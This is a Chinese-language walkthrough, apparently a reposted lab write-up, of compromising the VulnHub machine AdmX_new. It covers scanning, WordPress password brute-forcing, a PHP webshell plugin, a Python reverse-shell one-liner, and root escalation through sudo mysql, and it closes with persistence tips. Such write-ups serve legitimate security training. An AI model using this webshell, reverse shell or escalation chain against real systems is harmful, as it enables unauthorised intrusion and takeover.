AdmX_new 打靶记录(附靶机)

admin 2022年11月7日14:36:41评论60 views字数 2219阅读7分23秒阅读模式


0x01 主机发现

sudo nmap -sn 10.0.2.0/24
AdmX_new 打靶记录(附靶机)


0x02 端口扫描

sudo nmap -p- 10.0.2.7
AdmX_new 打靶记录(附靶机)


0x03 服务识别

sudo nmap -p80 -sV 10.0.2.7
AdmX_new 打靶记录(附靶机)


0x04 web服务探测

靶机只开放了 80 端口,尝试访问

AdmX_new 打靶记录(附靶机)


尝试路径爆破(使用 feroxbuster 或 dirsearch 都可以 ,字典使用的 kali 内置)

feroxbuster --url http://10.0.2.7 -w /usr/share/dirb/wordlists/common.txt


扫描结果,出现了很多 wordpress 字样,可以判断网站用的 wordpress 框架

AdmX_new 打靶记录(附靶机)


访问登录页面,可以看到页面持续加载

AdmX_new 打靶记录(附靶机)


抓个包看看

AdmX_new 打靶记录(附靶机)


可以看到在第一个请求的响应体里有多个 192.168.159.145 地址,下面的请求都是从第一个请求的响应体里发出,但由于请求不成功才导致页面的卡顿。尝试让页面加载时的请求全部指向本机。配置如下:

AdmX_new 打靶记录(附靶机)


类似于访问国外网站失败,重定向到国内镜像网站。也可用浏览器插件 Redirector  实现重定向。


现在再访问试试,正常显示。

AdmX_new 打靶记录(附靶机)


0x05 暴力破解 & 后台命令执行

尝试默认账号密码登录,失败了,但确定有 admin 账户。

AdmX_new 打靶记录(附靶机)


尝试密码爆破,这时候就看字典强大与否了,毕竟wp的漏洞利用基本都要登录后台。其实这里也可以使用 kali 自带的 wpscan,但需要代理请求,设置IP转发,所以暂时先没用,试试能不能爆破出来密码。

AdmX_new 打靶记录(附靶机)


成功登录后台,WP Version 5.7.1

AdmX_new 打靶记录(附靶机)


后台 getshell | 命令注入的思路一般为:

  1. Mdedia——上传软件包

  2. Appearance——编辑主题 例如:404Template.php,插入恶意代码

  3. Plugins——上传自定义恶意插件,压缩成zip、 激活插件、构造访问


操作上,自定义插件最灵活。创建 exp.php 文件,格式必须固定:

<?php/*Plugin Name: WebShellPlugin URI: https://yunju.blog.csdn.net/Description: muAuthor: mynameVersion: 1.0Author URI: https://yunju.blog.csdn.net/*/
if(isset($_GET['cmd'])){    system($_GET['cmd']);}?>

压缩成 zip 格式才能上传,上传后记得激活才能生效

zip exp.zip exp.php


访问插件路径(建议下载目标框架源码看看各种对外路径)

http://10.0.2.7/wordpress/wp-content/plugins/exp.php?cmd=id
AdmX_new 打靶记录(附靶机)


收集环境信息,如果能够直接执行 php 或是 python 那就反弹 shell ,如果有长度限制的话就反弹个 nc。查找命令可以看到有 Python3 环境。

AdmX_new 打靶记录(附靶机)


执行 pyhton 反弹 shell 命令:

python3 -c 'import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.4",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
AdmX_new 打靶记录(附靶机)


0x06 一次提权

可以看到当前为普通权限,由于当前没有bash权限,也执行不了sudo查看是否有配置不当。先查看内核信息,无提权可用

AdmX_new 打靶记录(附靶机)


WP 框架要记得去看配置信息,wp-config.php

AdmX_new 打靶记录(附靶机)


查看当前系统有什么账户

ls /home
AdmX_new 打靶记录(附靶机)


可以知道 MySQL 用户 admin 和密码 Wp_Admin#123,但数据库登录报错。切换用户也报错。试了下之前登录的密码 adam14,成功切换到 wpadmin 账户。

AdmX_new 打靶记录(附靶机)


在 /home/wpadmin 下拿到了第一个flag

AdmX_new 打靶记录(附靶机)


0x07 二次提权

执行 sudo -l

AdmX_new 打靶记录(附靶机)


可使用 root 用户 执行 mysql 操作,而 mysql 中是有 system这个函数的,由于之前尝试 WP 配置文件中的密码错误,那么就再尝试一开始的登录密码 adam14,提权步骤如下:

1、sudo /usr/bin/mysql -u root -D wordpress -p #密码adam142、! /bin/bash #切换到 root 权限的命令行f("hello world!");


读取 root 目录下的 flag

AdmX_new 打靶记录(附靶机)


0x08 出现的意外及注意点

1、不知为何,我这边的反弹 shell 都是不带用户名的,因此命令执行是否成功也不知道,就像这样。

AdmX_new 打靶记录(附靶机)


2、通常遇到 wordpress 框架,首先识别版本号,但由于此目标网站下的识别文件已移除,无法直接地识别。另一方面就是采用 wpscan 进行扫描,由访问有问题就没有直接使用了。


3、应该维持多个权限,通过某一处命令执行后,通常会多点上线,比如上线 CS 、MSF、定时任务反弹、写入恶意 DLL等。这里其实也可以直接使用 MSF 上线的。


AdmX_new 打靶记录(附靶机)


靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z



声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白名单。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本公众号无关。



原文始发于微信公众号(白帽学子):AdmX_new 打靶记录(附靶机)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月7日14:36:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AdmX_new 打靶记录(附靶机)http://cn-sec.com/archives/1394733.html

发表评论

匿名网友 填写信息